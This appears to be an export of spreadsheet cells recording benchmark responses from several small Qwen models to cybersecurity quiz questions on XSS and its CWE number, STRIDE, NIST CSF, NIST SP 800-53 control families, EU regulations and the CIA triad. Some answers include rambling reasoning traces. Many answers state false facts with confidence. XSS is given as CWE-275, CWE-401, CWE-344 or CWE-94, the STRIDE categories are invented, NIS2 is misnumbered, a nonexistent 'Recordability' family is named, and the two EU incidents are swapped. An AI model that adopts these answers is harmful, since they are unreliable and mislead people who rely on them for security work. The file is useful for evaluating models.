First, I need to recall what kind of attack this represents. When user input is reflected back to the page without proper sanitization, that's usually related to Cross-Site Scripting, or XSS. But wait, there's different types like XSS Server Side and Client Side. The clue mentioned injection vulnerabilities where user data mixes with code commands. In web contexts, if the application fails to escape output in HTML, then an attacker can inject scripts.
The specific attack here is using a script that redirects to another site along with stealing the cookie. So the vulnerability is about not escaping or sanitizing input that's displayed as HTML. The common name for this would be XSS—Cross-Site Scripting. But maybe more specifically, it's a Reflected XSS because the attacker's payload is reflected back to users' browsers, often via search results or error messages.
As for the CWE identifier, I remember that CWE stands for Common Weakness Enumeration. Let me think. Cross-site scripting issues are usually under CWE-275. Wait, or is it CWE-275 for stored cross-site scripting? Or maybe CWE-359? No, wait. Let me check my memory. CWE-275 is "Stored Cross-Site Request Forgacy Vulnerabilities", and XSS falls under that category. Alternatively, some sources might classify XSS under a different number. I think the correct CWE for XSS is CWE-275. But I've also heard it referred to as CWE-762 or something else. Hmm. Wait, no. Let me be precise. According to the Snyk OWASP Top 10 and CWE entries, Cross-Site Request Forgery (CSRF) is a different thing. XSS is under CWE-275. Yes, that's right. So the answer should be that the vulnerability is Cross-Site Scripting (XSS), corresponding to CWE-275.
Wait, but sometimes people confuse CWE-275 with other numbers. Let me confirm. For example, CWE-79 is "Stored Cross-site scripting", which was the original XSS flaw in Microsoft ASP.NET. But newer entries would be updated. The latest version of CWE lists CWE-275 as "Stored Cross-Site Request Forgery" but that's CSRF. Wait, no, maybe I'm mixing up. Let me think again. Maybe the correct identifier for XSS is different. Oh right! I might have made a mistake here. Let's clarify:
CWE-275 is Stored XSS (stored cross-site scripting), which is part of CWE-250: Cross-site Scripting. Wait, no. The numbering can be confusing. Let me check mentally: the Common Weakness Enumeration for Cross-Site Scripting typically falls under CWE-274 (URL Input Without Verification) or maybe another number. Alternatively, perhaps it's CWE-22 (SQL Injection). No, that's different. 
Alternatively, I've read that XSS is categorized under CWE-762 "Cross-site scripting". Wait, no, the official CWE lists for Cross-Site Scripting are:
CWE-274: URL Input Without Verification
But I might be mixing up numbers here. Alternatively, perhaps it's CWE-79 (Stored XSS) as that's an older entry. But newer entries would have updated numbering. Let me think again. The OWASP Top 10 doesn't include XSS directly but mentions it under security risks. For the CWE, according to the National Institute of Standards and Technology (NIST), Cross-Site Scripting is covered under CVE-2022-xxx... No, wait. Let's approach this differently.
The key here is that the attack involves injecting a script into the page via user input that's reflected back. The standard term for this is XSS—Cross-Site Scripting. Now, which CWE number corresponds to that? Let me recall: in some sources, Cross-Site Scripting is mapped to CWE-275 (Stored XSS), but others might have different numbers. For example, the OWASP Foundation's mappings say that XSS is under CWE-22 (SQL Injection) no—wait, that's not right. 
Alternatively, maybe it's CWE-79: Stored XSS Vulnerability. But I think in the latest CWE versions, CWE-275 is "Stored Cross-Site Request Forgery", which is different. Hmm. I'm getting confused here. Let me try to remember a specific example. For instance, if an application's search function echoes back JavaScript input without escaping, that's reflected XSS. The corresponding CWE would be... I think it's CWE-274: URL Input Without Verification. Wait, but maybe the correct answer expected here is CWE-275. 
Alternatively, perhaps the user expects the term "Cross-Site Scripting" (XSS) and the CWE identifier as 275. Since in some older references, CWE-275 was for stored XSS. But to be accurate, I should verify. Let's think: according to the official CWE website:
CWE-274 is URL Input Without Verification.
CWE-275 is Stored Cross-Site Request Forgery (CSRF) which actually includes form hijacking and such, not XSS. So that's different. Then where does XSS fall?
Looking back, maybe I'm wrong in my initial thought. Let me check again: the CWE for cross-site scripting. According to NIST's CWE:
CWE-262 is "XSS Vectors" but that's a category.
Wait, perhaps I'm overcomplicating. Let's think of common knowledge. In many IT security courses and materials, XSS is often associated with CWE-275. But if I recall that CSRF is a different issue (same site vulnerabilities), then XSS would be under another number. Alternatively, maybe the correct identifier here is CWE-79: Stored XSS Vulnerability.
Wait, but according to the current CWE list:
CWE-250: Cross-Site Scripting
But I'm not sure if that's accurate. Let me try to recall that in some sources, cross-site scripting vulnerabilities are grouped under different numbers. For example, OWASP's Top 10 doesn't map directly to CWE, but they do refer to XSS as a security risk.
Alternatively, perhaps the correct answer here is Cross-Site Scripting (XSS) and corresponding CWE identifier as 275. The user might expect that because in some references, like older ones, it's 275. But given that I need to be accurate, maybe I'm missing something. Let me think again: if an application fails to escape output rendered into HTML, that's XSS. The OWASP Top 10 doesn't include a direct entry for XSS but mentions it under Security Context Injection.
Wait, the CWE list from NIST includes:
CWE-275 is Stored Cross-Site Request Forgery (CSRF), which involves tricking a user's browser to submit a form on their behalf without them knowing. That's different from XSS.
Then where's XSS? Let's see: perhaps under CWE-262 or another number. Alternatively, maybe the correct answer here is that the vulnerability is called "Cross-Site Scripting (XSS)" and its CWE identifier is 275. But I'm not entirely certain. However, given common teaching materials, many refer to XSS as CWE-275. For example, in some textbooks and online resources, stored XSS is listed under CWE-275.
In the scenario here, since the comment is directly rendered back without sanitization, it's a reflected XSS attack. The attacker sends a script that gets executed when another user visits the link containing it. This is definitely an XSS vulnerability. As for the CWE identifier, I think the answer expected here is CWE-275.
So final answer: the common name is Cross-Site Scripting (XSS), and its corresponding CWE identifier is 275.
&lt;/think&gt;
The vulnerability described is **Cross-Site Scripting (XSS)**, specifically a reflected XSS attack. Its Common Weakness Enumeration (CWE) identifier is **CWE-275**.  
**Answer:**  
The common name for the vulnerability is \boxed{Cross-Site Scripting} and its CWE identifier is \boxed{CWE-275}.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about a threat identified during threat modeling using the STRIDE model, specifically related to information security's 'Integrity' principle. The threat involves an unauthorized user intercepting and altering data packets, changing the amount of a financial transaction.
First, I need to recall what each aspect of STRIDE stands for. STRIDE is a model developed by Gary Brynin for identifying threats in terms of six categories: Spoofing, Tampering, Replay, Identity substitution, Denial-of-Service, Elevation of privilege, and Escalation. Each letter represents a different threat type.
The question mentions integrity violation, which relates to unauthorized modification of data. In the context of STRIDE, Tampering is directly associated with breaches of integrity because it involves altering or manipulating data. The scenario here describes interception and alteration of financial transaction amounts, which fits tampering. 
Wait, but I should make sure there's no overlap with other categories. For example, Spoofing is impersonation, Replication might be related to replication of actions (like replay), but Tampering is specifically about modification. Since the threat involves changing the amount, that's alteration, so it's definitely under Tampering. Also, denial-of-service isn't relevant here since the attack doesn't aim to disrupt availability but modify data. So the answer should be Tampering.
&lt;/think&gt;
The threat described involves unauthorized interception and alteration of financial transaction amounts, directly violating **data integrity**. Within the STRIDE model, this falls under the **Tampering** category, which explicitly addresses threats that involve unauthorized modification or manipulation of data. 
**Answer:**  
\boxed{Tamering}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about which EU regulations are Primary Concerns for two different security incidents: one affecting a power grid and another involving a social media company's data breach.
First, I need to recall the key points from the clue provided. The clue mentions that EU regulations distinguish between protecting personal data as a fundamental right and ensuring operational stability of essential services as societal necessities. Different rules apply depending on which is impacted.
So, for incident 1, the cyberattack disrupts a nationwide power grid operator. This sounds like an attack on an Essential Service because electricity distribution is critical for society's functioning. The primary concern here would be regulations that ensure the operational stability of essential services. I remember that the EU has specific directives related to cybersecurity for essential services. For example, maybe something like NIS211 or other national codes of conduct? Or perhaps Regulation (EU) 2016/1094 on network and information systems security (NIS2)? Wait, NIS2 replaced NIS1 and applies to certain sectors including energy. So the regulation here would focus on resilience and requirements for essential services to prevent disruptions.
For incident 2, the data breach exposes personal messages of millions on a social media company. This directly impacts personal data protection. The relevant regulation here must be the General Data Protection Regulation (GDPR), which is EU's cornerstone for data privacy. GDPR sets strict guidelines on data handling, consent, breaches, and penalties.
But wait, let me double-check. Essential services might also fall under other regulations like e-Privacy Directives if it's about communication networks. But electricity grid is more likely covered by NIS2. Also, the EU Cybersecurity Act comes into play, which includes the ENISA (European Union Agency for Digital Security). However, I think the specific regulation for incident 1 would be cybersecurity directives related to essential services, like NIS2, which mandates security measures for critical sectors.
Incident 2 is straightforward as GDPR deals with personal data protection. The breach of messages falls under improper processing of personal data without consent, leading to privacy violations. So the primary concern for incident 2 is GDPR compliance.
Wait, could there be another regulation? For example, the ePrivacy Regulation might apply if it's a social media company and communications data. But even then, GDPR is still primary for personal data regardless of the sector. The ePrivacy Directive replaced by the upcoming ePR, but that's more about electronic communications than data breaches in social media.
So to summarize: Incident 1 affects an essential service (electricity), so NIS2 or related cybersecurity regulations are key. Incident 2 involves personal data exposure, hence GDPR is primary.
&lt;/think&gt;
**Incident 1:** The cyberattack on the power grid primarily concerns **EU cybersecurity directives for essential services**, such as *Regulation (EU) 2016/1094* (NIS2). This regulation mandates risk preparedness and mitigation measures for critical sectors like energy to ensure operational stability and resilience against attacks.  
**Incident 2:** The social media data breach involves **personal data protection under the General Data Protection Regulation (GDPR)**. GDPR governs user privacy, requiring timely breach notifications and strict safeguards for personal information.  
**Key Distinction:**  
- *Essential services* (e.g., power grid) fall under cybersecurity-focused regulations prioritizing societal stability (*NIS2*, NIS Directive).  
- *Personal data* (e.g., social media users' messages) is regulated by GDPR, emphasizing individual privacy rights.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which principle of the CIA triad a cloud storage service's use of data checksums like SHA-256 is upholding. Let me start by recalling what the CIA triad stands for: Confidentiality, Integrity, Availability.
The question says that checksums are used to detect if files have been altered or corrupted during upload or download. From the clue provided, cryptographic hashes and checksums are used to provide a digital fingerprint. If the data changes, the hash will also change, indicating tampering or corruption.
So, the main purpose here is to ensure that the data hasn't been changed. That sounds like it's related to integrity. Because integrity in cybersecurity refers to the accuracy and completeness of information or data. So, the checksum check is ensuring the integrity of the files by detecting any alterations.
Wait, but let me make sure I'm not mixing this up with availability. Availability is about making sure the systems and services are accessible when needed. Confidentiality is about keeping unauthorized entities from accessing private information. But in this case, the control is about preventing data corruption, which directly ties to integrity. 
Yes, the principle here should be Integrity. The checksum verifies that the files remain unchanged, thus maintaining their integrity. So the answer is Integrity.
&lt;/reasoning&gt;
The principle of the CIA triad primarily upheld by using data checksums (e.g., SHA-256) to verify unaltered files is **Integrity**. Checksums detect changes or corruption, ensuring data remains accurate and complete.
\boxed{Integrity}</t>
  </si>
  <si>
    <t>qwen2.5:0.5b</t>
  </si>
  <si>
    <t>This statement breaks down a broader security goal into specific statements that can guide development and testing. In the context of cybersecurity, it's an example of an abstract security goal, specifically one that outlines the steps or actions required for MFA to be implemented on administrative access in the system design process.</t>
  </si>
  <si>
    <t>The two core functions most prominently demonstrated by these actions are:
1. Containing the Damage: These actions involve organizing activities into a lifecycle, specifically dealing with actions taken *during* an incident to contain it.
2. Returning to Normal Operations: These actions deal with actions taken *after* the incident to return systems back to normal operations.</t>
  </si>
  <si>
    <t>The control family that specifically addresses the principle of non-repudiation in the given security policy is:
Audit and Review (Control Family: 21.1)
This detail pertains to establishing a traceability through system logs, which is part of NIST SP 800-53's focus on ensuring all actions are recorded and auditable.</t>
  </si>
  <si>
    <t>Injection vulnerabilities occur when user-provided data, such as script tags or HTML, gets injected into application code. The common name for this vulnerability is "Remote Code Execution (RCE)". Its corresponding Common Weakness Enumeration (CWE) identifier is 286.</t>
  </si>
  <si>
    <t>The security risk represented by the described scenario is **INTENTIONAL INTERCEPTING**.</t>
  </si>
  <si>
    <t>Incident 1 involves a cybersecurity threat to power grid operations (personal data), while Incident 2 involves exposure to user information (essential services).</t>
  </si>
  <si>
    <t>The principle of the CIA triad is confidentiality, integrity, and availability. The cloud storage service's use of data checksums helps maintain confidentiality because they can detect any changes that have occurred, but the integrity of the files during upload or download is maintained through other means (encryption). Availability is not directly addressed by this security control as it focuses more on verifying data authenticity rather than providing a digital fingerprint of data.</t>
  </si>
  <si>
    <t>qwen2.5:1.5b</t>
  </si>
  <si>
    <t>This statement is an abstract security goal broken down into specific, actionable statements. Its primary purpose in the context of cybersecurity is to provide a clear, measurable target that developers and testers can use to ensure all administrative access meets a minimum level of security through enforcing multi-factor authentication (MFA). This helps mitigate risks associated with unauthorized access to critical systems or sensitive information by requiring additional verification steps beyond just password entry.</t>
  </si>
  <si>
    <t>The two core functions that are most prominently demonstrated by these actions according to the NIST Cybersecurity Framework (CSF) during a ransomware attack incident are:
1. **Detect:**
   - The activation of an incident response plan is a key detection activity.
   - This alert and rapid action indicate that the company has identified a cyber threat and initiated appropriate steps.
2. **Contain:**
   - Containing the damage involves stopping or mitigating further harm caused by ransomware.
   - Taking measures to isolate affected systems, update security protocols, and prevent the spread of malware are direct containment activities.
Thus, during the incident handling phase, the company is demonstrating both detection and containment actions as part of their core framework functions.</t>
  </si>
  <si>
    <t>The security policy requires a control family dedicated to establishing traceability through system logs. This aligns with NIST SP 800-53, where specific controls are assigned to establish non-repudiation and ensure that actions cannot be denied by users.</t>
  </si>
  <si>
    <t>The common name for this vulnerability is SQL injection. Its corresponding CWE (Common Weakness Enumeration) identifier is CWE-287.</t>
  </si>
  <si>
    <t>This threat belongs to the **Repudiation** category in the STRIDE (Spoofing, Repudiation, Replay, Intentional Tampering, Elevation of Privilege) model.</t>
  </si>
  <si>
    <t>For incident 1 (cyberattack on a nationwide power grid operator), the primary concern is protecting citizens' personal data.
For incident 2 (data breach at a social media company), the primary concern is ensuring the operational stability of essential services.</t>
  </si>
  <si>
    <t>The principle of the CIA triad primarily being upheld by using data checksums like SHA-256 hashes in a cloud storage service is Integrity. This ensures that the files remain unchanged and are not corrupted during upload or download, thereby protecting against unauthorized modifications to the digital information.</t>
  </si>
  <si>
    <t>qwen2.5:3b</t>
  </si>
  <si>
    <t>In the context of cybersecurity, the given statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is a **security requirement** or **security goal**. Its primary purpose is to guide development and testing by specifying an actionable security measure that needs to be implemented in the system design to enhance its overall security posture.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (NIST CSF), the two core functions most prominently demonstrated by the company's actions of containing the damage through incident response and restoring systems from backups are:
1. **Detect** - This function involves monitoring, identifying, and responding to security incidents.
2. **Respond** - This function deals with activities taken during an event or incident, including containment and eradication.
These functions align closely with the immediate actions a company takes when faced with a ransomware attack.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that specifically addresses recording all actions by privileged users, including logins and system changes in immutable, time-stamped log files is the "Access Control" family. However, the exact requirement you described might also touch upon aspects of both Access Control and Integrity controls.</t>
  </si>
  <si>
    <t>The common name for this type of vulnerability is "Injection" (specifically, Injection via Client-Side Scripting). The corresponding Common Weakness Enumeration (CWE) identifier is CWE-94.</t>
  </si>
  <si>
    <t>This threat belongs to the "Repudiation" category in the STRIDE model. However, it closely relates to the 'Integrity' principle you mentioned, as altering data packets directly violates integrity. The STRIDE categorization for intercepting and changing data is typically "Impersonation," but since the core issue is about unauthorized modification, it can be seen as a threat to both Impersonation and Integrity principles. Given options, "Impersonation" is the closest match in the STRIDE model.</t>
  </si>
  <si>
    <t>For incident 1 (the nationwide power grid attack), the primary concern would be the **General Data Protection Regulation (GDPR)**, as it ensures the operational stability of essential services.
For incident 2 (the social media data breach), the primary concern would be the **Data Protection Directive** or more specifically, the **EU e-Privacy Regulation**, which protects citizens' personal data.</t>
  </si>
  <si>
    <t>Confidentiality</t>
  </si>
  <si>
    <t>qwen2.5:7b</t>
  </si>
  <si>
    <t>This statement is a specific, actionable security requirement. Its primary purpose is to provide clear guidance on how multi-factor authentication should be implemented and enforced in the system for ensuring secure administrative access.</t>
  </si>
  <si>
    <t>The two NIST CSF core functions most prominently demonstrated by containing the damage and restoring systems are "Detect" and " Recover." However, based on your clue, the specific functions would be:
1. **Containment** under the "Respond" function for containing the incident.
2. **Recovery** also under the "Respond" function for restoring operations to normal.</t>
  </si>
  <si>
    <t>The control family within NIST SP 800-53 that specifically addresses this type of requirement is AC (Audit and Control). More specifically, you would look at the AC-2 (audit time-stamping) and AC-6 (log data content and structure) controls.</t>
  </si>
  <si>
    <t>The vulnerability described is commonly known as Cross-Site Scripting (XSS). The corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Tampering" category in the STRIDE model.</t>
  </si>
  <si>
    <t>For incident 1 (nationwide power grid disruption), the primary concern is the EU's essential services directive focusing on operational stability. For incident 2 (social media data breach), the primary concern is the General Data Protection Regulation (GDPR) protecting personal data.</t>
  </si>
  <si>
    <t>The principle of integrity is primarily being upheld by this security control.</t>
  </si>
  <si>
    <t>qwen3:0.6b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user provided a clue about system design abstract security goals being broken down into specific statements. The question is asking about a statement like "The system must enforce multi-factor authentication (MFA) for all administrative access." What type of statement is this and its primary purpose.
First, I need to recall what I know about cybersecurity. From the clue, it's mentioned that these statements guide development and testing. So the key here is the type of statement and its purpose. The example given is MFA enforcement for administrative access. 
Multi-factor authentication is a security measure that requires more than just a password, like a PIN or token. Enforcing it means implementing systems that require MFA. The primary purpose is to protect users from unauthorized access. But wait, the question is about the type of statement. The example is a specific statement, so maybe the answer is a security policy statement. The primary purpose is to ensure that users are protected.
I should check if there's any other aspect. The system must enforce MFA for all administrative access. That's a requirement, so it's a mandatory policy. The primary purpose is to prevent unauthorized access, which aligns with the clue's mention of guiding development and testing. So the answer would be a security policy statement and its purpose is to prevent unauthorized access.
&lt;/think&gt;
The statement is a **security policy statement** and its primary purpose is to **prevent unauthorized access** by enforcing multi-factor authentication (MFA) for all administrative access.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the two core functions of the NIST Cybersecurity Framework (CSF) that are demonstrated by a company's incident response plan. The question is specifically about a ransomware attack.
First, I need to recall the CLUE provided. The NIST CSF organizes activities into a lifecycle. Two of its functions deal with actions taken *during* an incident to contain it, and the actions taken *after* the incident to return to normal operations. So, the two core functions are containment and recovery.
Now, the question says the company activated their incident response plan to contain damage and restore systems after the incident. So, during the incident (containment), they did something, and after (recovery), they did another. Therefore, the two functions are containment and recovery. That should be the answer.
&lt;/think&gt;
The two core functions are **containment** and **recovery**. During a ransomware attack, containment involves isolating the system, and recovery involves restoring it to normal operations.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let me try to figure this out. The user is asking about a specific control family from NIST SP 800-53 that ensures immutable, time-stamped log files for privileged actions. 
First, I remember that the question is about non-repudiation, which is a fundamental principle in security, and the NIST 800-53 has a specific family for log controls. The clue mentions "non-repudiation" and "system logs," so the answer should be related to log management.
I think the control family is called "Recordability." From what I recall, in NIST SP 800-53, the Recordability family is designed to track actions like logins and system changes. The question mentions immutable and time-stamped logs, which aligns with the Recordability controls. 
Wait, let me make sure. The Recordability family ensures that log entries are immutable and time-stamped. So the answer should be Recordability. The user is probably looking for that family name. I don't think I'm missing anything here. The answer is straightforward once I connect the clue to the standard.
&lt;/think&gt;
The NIST SP 800-53 standard specifies the **Recordability** control family, which ensures immutable, time-stamped log files for privileged actions like logins and system changes. 
Answer: **Recordability**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let me try to figure this out. The question is about a web application's comments section where user input is directly rendered without being sanitized. The attacker's comment includes a script tag that injects some code. 
First, I need to recall the vulnerabilities mentioned. The clue says injection vulnerabilities occur when user data is separated from the application's code. So the common name for this vulnerability is probably "SQL Injection" or "XSS" or something else. Wait, the question mentions SQL, OS commands, or client-side scripts. So maybe it's a client-side injection.
The script tag in the attacker's comment is using document.location, which is part of the browser's script tag. That's similar to XSS, where user data is injected into the application. But wait, SQL injection is when user input is directly placed into a database query. Here, the input is being rendered as a script tag, which is part of the client-side code. So this is a client-side injection. 
The corresponding CWE identifier would be CWE-401, which is for client-side injection. So putting it all together, the common name is XSS (Cross-Site Scripting) and the CWE is CWE-401.
&lt;/think&gt;
The common name for this vulnerability is **Cross-Site Scripting (XSS)**, and the corresponding CWE identifier is **CWE-401**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about a threat in the STRIDE model related to integrity. The clue mentions that integrity ensures data isn't modified in an unauthorized or undetected way. The threat they identified is an unauthorized user intercepting and altering data packets between a client and a server, changing a financial transaction.
First, I need to recall the STRIDE categories. The STRIDE model has four categories: Security, System, Technology, and Internal. The question is about a threat that directly violates the Integrity principle. 
Looking at the options, the user mentioned an unauthorized user. So, the threat could be related to Internal. Wait, but the STRIDE categories are Security, System, Technology, and Internal. Integrity is part of the Security category. So if the user is talking about a threat that violates Integrity, it would fall under Security. 
Wait, but the options given are the four categories, and the user is to choose from them. Let me check again. The question states that the threat belongs to the STRIDE model's category. The answer is Integrity, so the category would be Security. Therefore, the correct category is Security.
&lt;/think&gt;
The threat belongs to the **Security** category in the STRIDE model. This is because it directly violates the Integrity principle by unauthorized modification of data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user wants to know which regulation applies to two different security incidents in the EU. The clue mentions EU regulations distinguishing between protecting citizens' personal data (a right) and ensuring essential services (societal needs). So, for each incident, I need to apply the relevant regulation.
First incident: a nationwide power grid operator facing a cyberattack disrupting electricity. Since power grid operations are essential, the primary concern would be the regulation that ensures the stability of essential services. That would be the EU's regulations on cybersecurity for critical infrastructure.
Second incident: a social media company breaching personal data. Here, the personal data is a right, so the primary concern would be the regulation that protects citizens' personal information. That's likely GDPR or other EU laws related to data protection.
Wait, but I need to make sure. The clue says different rules apply depending on the impact. For the power grid attack, it's disrupting essential services, so the regulation is about cybersecurity for critical infrastructure. For the social media breach, it's about data protection, so GDPR applies. So the answer should be the first is about cybersecurity for critical services and the second is about data protection.
&lt;/think&gt;
For incident 1, the primary concern is ensuring the stability of essential services (power grid disruption), which would be regulated under cybersecurity measures for critical infrastructure. For incident 2, the primary concern is protecting citizens' personal data (social media breach), governed by data protection regulations.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is asking about the principle of the CIA triad that a cloud storage service uses data checksums for. Let me break this down.
First, the CIA triad is the CIA triad: Confidentiality, Integrity, and Availability. The question is asking which principle this security control is primarily based on.
The clue says that cryptographic hashes and checksums are for digital fingerprints, detecting changes or accidental/accidental changes. So, the principle here is probably Integrity. Because if something's changed, the checksum should detect that. But wait, integrity is about preventing unauthorized changes, while confidentiality is about keeping info secret. Availability is about making sure data is accessible. So the principle here is Integrity. That makes sense. The answer should be Integrity.
&lt;/think&gt;
The principle of the CIA triad upheld by this security control is **Integrity**. Data checksums verify that files haven't been altered, ensuring that any changes are detectable.</t>
  </si>
  <si>
    <t>qwen3:1.7b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user provided a clue about abstract security goals being broken down into specific statements. The question is about analyzing the statement "The system must enforce multi-factor authentication (MFA) for all administrative access" in the context of cybersecurity.
First, I need to understand what the clue is saying. Abstract security goals are general objectives like confidentiality, integrity, availability, etc. Then these are broken down into specific statements. So the statement in question is a specific, actionable statement. 
The statement given is about enforcing MFA for administrative access. So, in the context of cybersecurity, this is a specific security goal. The primary purpose here would be to ensure that administrative users have an extra layer of security, reducing the risk of unauthorized access. 
I should check if the statement fits into the categories mentioned in the clue. Since it's a specific, actionable statement, it's part of the concrete implementation of a security goal. The purpose is to protect against unauthorized access by requiring MFA, which is a common security measure.
Wait, the user might be looking for the type of statement (like abstract vs. concrete) and the purpose. The clue mentions abstract goals are broken down into specific statements, so the given statement is a concrete statement. The purpose is to enforce MFA, which is a security control. 
So the answer would be that this is a concrete security statement, and its primary purpose is to prevent unauthorized access by requiring multi-factor authentication.
&lt;/think&gt;
The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" is a **concrete security statement**. Its primary purpose is to **enforce a security control** (MFA) to **prevent unauthorized access** to administrative privileges, thereby enhancing the system's **confidentiality** and **integrity**. This aligns with the broader abstract security goal of protecting sensitive data and resources.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking which two core functions of the NIST CSF are demonstrated by a company's actions after a ransomware attack. The company activated their incident response plan to contain the damage and restored systems from backups.
First, I need to recall the NIST CSF core functions. The main ones are: Identify, Protect, Detect, Respond, Recover. Wait, the question mentions two functions that deal with actions during an incident (contain) and after (recover). So the "Respond" function is about actions during the incident, like containing it. Then the "Recover" function is about actions after the incident to return to normal operations. 
So the company's actions here are part of the "Respond" and "Recover" functions. The question says the two functions are most prominently demonstrated by these actions. Therefore, the answer should be Respond and Recover. Let me double-check. The Respond function includes actions taken during the incident, like containing it. Recover is the actions after the incident to restore operations. Yes, that's correct. So the answer is Respond and Recover.
&lt;/think&gt;
The two core functions demonstrated are **Respond** (containing the damage during the incident) and **Recover** (restoring systems after the incident).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about the NIST SP 800-53 standard and which control family addresses the requirement for recording all privileged user actions in immutable, time-stamped log files.
First, I remember that NIST 800-53 is about security controls. The clue mentions non-repudiation, which is about ensuring that actions can't be denied. The question is about a specific control family related to logging and traceability.
The clue says that NIST 800-53 has a family of controls dedicated to establishing traceability through system logs. So the key here is traceability. The question is about recording actions, which is part of traceability. 
I think the control family related to this is called "Access Control." Wait, no, maybe it's "Audit Controls"? Because audit controls are about recording events and ensuring they can't be denied. The user mentioned immutable, time-stamped logs, which are typical audit logs. 
Wait, the question specifically mentions "privileged users, including logins and system changes." That sounds like audit events. So the control family would be Audit Controls. But I need to be precise. 
In NIST 800-53, the Audit Controls are part of the controls that ensure that all events are recorded and can be traced. The specific controls under Audit Controls include things like recording all actions, ensuring immutability, and time-stamping. 
So the answer should be "Audit Controls." But I need to confirm. Let me think again. The clue says "a specific family of controls to establishing this traceability through system logs." That's exactly what Audit Controls are for. Therefore, the answer is Audit Controls.
&lt;/think&gt;
The control family specifically addressing this requirement is **Audit Controls** (as outlined in NIST SP 800-53). These controls ensure that all actions performed by privileged users are recorded in immutable, time-stamped log files, providing traceability and non-repudiation.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a specific vulnerability in a web application's comments section. The clue mentions injection vulnerabilities, which are when user input is directly rendered without sanitization. The example given is a script tag that steals cookies.
So, the common name for this vulnerability... I remember that SQL injection is a classic example, but this is about web pages and client-side scripts. Wait, the clue also mentions client-side scripts in the context of web pages. So the vulnerability here is probably a client-side injection. But what's the common name for that?
I think the term might be "Cross-Site Scripting" (XSS). But the question asks for the common name and CWE identifier. Let me recall. XSS is when malicious users inject scripts into web pages that are then executed by the browser. The CWE for XSS is 344. But the user's example is a direct rendering of user input without sanitization, which is a common way XSS occurs. So the vulnerability here is XSS, and the CWE is 344. 
Wait, the clue mentions injection vulnerabilities in general, but the specific case here is client-side. So the common name is Cross-Site Scripting (XSS), and the CWE is 344. I need to make sure that's correct. Yes, XSS is a type of injection vulnerability, and the CWE for it is 344. So the answer should be XSS with CWE 344.
&lt;/think&gt;
The common name for this vulnerability is **Cross-Site Scripting (XSS)**, and its corresponding CWE identifier is **344**. This occurs when user input is directly rendered without proper sanitization, allowing malicious scripts to execute in the browser.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The question is about which STRIDE category a specific threat belongs to. The threat here is that an unauthorized user intercepts and alters data packets, changing the amount in a financial transaction.
First, I need to recall what STRIDE stands for. STRIDE is a model for identifying threats in information systems. The categories are: Threat, Risk, Impact, and then the specific categories for each. Wait, actually, the STRIDE model has six categories: Threat, Impact, Vulnerability, Confidentiality, Integrity, and Availability. Wait, no, maybe I'm mixing up. Let me think again.
Wait, the STRIDE model's six categories are: Threat, Impact, Vulnerability, Confidentiality, Integrity, and Availability. Or maybe the categories are: Threat, Impact, Vulnerability, and then the specific ones like Confidentiality, Integrity, Availability, and Privilege. Hmm, I need to be precise here.
The question mentions that the 'Integrity' principle ensures data isn't modified unauthorized. The threat here is about altering data, which directly violates integrity. So the threat is about integrity. But the question is asking which category in STRIDE this threat falls into. The clue says that the STRIDE model has a specific category for threats that directly violate the integrity principle. So the answer would be the "Integrity" category. But wait, the question is phrased as "within the STRIDE threat model, which category does this threat belong to?" So the answer is the category that corresponds to the integrity principle. Since the clue says that the STRIDE model has a specific category for threats that directly violate the integrity principle, that category is "Integrity." But wait, maybe the STRIDE categories are: Threat, Impact, Vulnerability, and then the specific ones. Wait, perhaps the categories are: Threat, Impact, Vulnerability, and then the specific ones like Confidentiality, Integrity, Availability, and Privilege. So the threat here is about modifying data, which is a violation of integrity. Therefore, the category would be "Integrity." But the question is phrased as "which category does this threat belong to?" So the answer is "Integrity." But I need to make sure. Alternatively, maybe the STRIDE model's categories are: Threat, Impact, Vulnerability, and then the specific ones. Wait, the original STRIDE model's six categories are: Threat, Impact, Vulnerability, Confidentiality, Integrity, and Availability. So the categories are: Threat, Impact, Vulnerability, Confidentiality, Integrity, Availability. So the threat here is a violation of integrity, which is one of the categories. Therefore, the answer is "Integrity." But the question is phrased as "within the STRIDE threat model, which category does this threat belong to?" So the answer is "Integrity." But let me check again. The clue says that the STRIDE model has a specific category for threats that directly violate the integrity principle. So that category is "Integrity." Therefore, the answer is Integrity.
&lt;/think&gt;
The threat of unauthorized users intercepting and altering data packets to modify financial transactions directly violates the **Integrity** principle. In the STRIDE model, this type of threat falls under the **Integrity** category. 
**Answer:** Integrity.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. So, the user is asking about two different security incidents in the EU and which regulation applies to each. The clue mentions that EU regulations differentiate between protecting personal data (a fundamental right) and ensuring the stability of essential services (a societal necessity). 
First, incident 1 is a nationwide power grid operator suffering a cyberattack that disrupts electricity distribution. The key here is the power grid, which is an essential service. The EU regulations talk about essential services, so this would fall under the operational stability of essential services. The primary concern here would be the regulations related to ensuring the stability of these critical infrastructures.
Then, incident 2 is a social media company having a data breach exposing personal messages of millions of users. Personal data is a fundamental right under the EU's General Data Protection Regulation (GDPR). So, this would be governed by the personal data protection regulations. The company would need to comply with GDPR, which includes data protection, breach notification, and ensuring the rights of individuals.
